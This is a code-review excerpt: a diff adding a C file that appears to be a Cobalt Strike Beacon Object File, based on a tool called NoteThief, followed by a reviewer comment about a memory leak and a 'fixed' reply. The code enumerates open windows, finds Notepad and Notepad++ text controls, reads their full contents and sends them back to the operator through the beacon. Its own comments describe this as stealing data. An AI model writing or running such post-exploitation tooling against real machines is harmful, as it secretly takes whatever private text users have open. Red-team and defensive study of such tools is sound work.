src/SA/notepad/entry.c

```diff
@@ -0,0 +1,75 @@
+#include <windows.h>
+#include "bofdefs.h"
+#include "base.c"
+/*	Idea based on https://github.com/trainr3kt/NoteThief
+	- The original only grabbed the highest level Z window
+	- Searches all visible windows with non-null names
+	- Adds ability to steal data from notepad++
+	- Could potentially be expanded to allow specification of a string to search for in Window Name and a string to correspond to a control
+*/
+
+BOOL CALLBACK EnumWindowClasses(HWND hWndParent, LPARAM lParam)
+{
+	char ClassName[128] = {0};
+	char WindowName[128] = {0};
+	char *buffer;
+	int len = 65535;
+	char *needle = (char*) lParam;
+	DWORD WinLen = USER32$GetClassNameA(hWndParent, ClassName, 127);
+	WinLen = USER32$GetWindowTextA(hWndParent, WindowName, 127);
+
+	if (ClassName[0] != 0 && WinLen){
+		if(MSVCRT$strcmp(ClassName, needle) == 0) {
+			buffer = (char*)MSVCRT$calloc(1, len+1);
+			USER32$SendMessageA(hWndParent, WM_GETTEXT, len, (LPARAM)buffer);
+			BeaconPrintf(CALLBACK_OUTPUT, "[+] Notepad++ Found: %s\n%s", WindowName, buffer);
```

Comment:
Buffer is leaked and should be freed after this line

Reply:
fixed.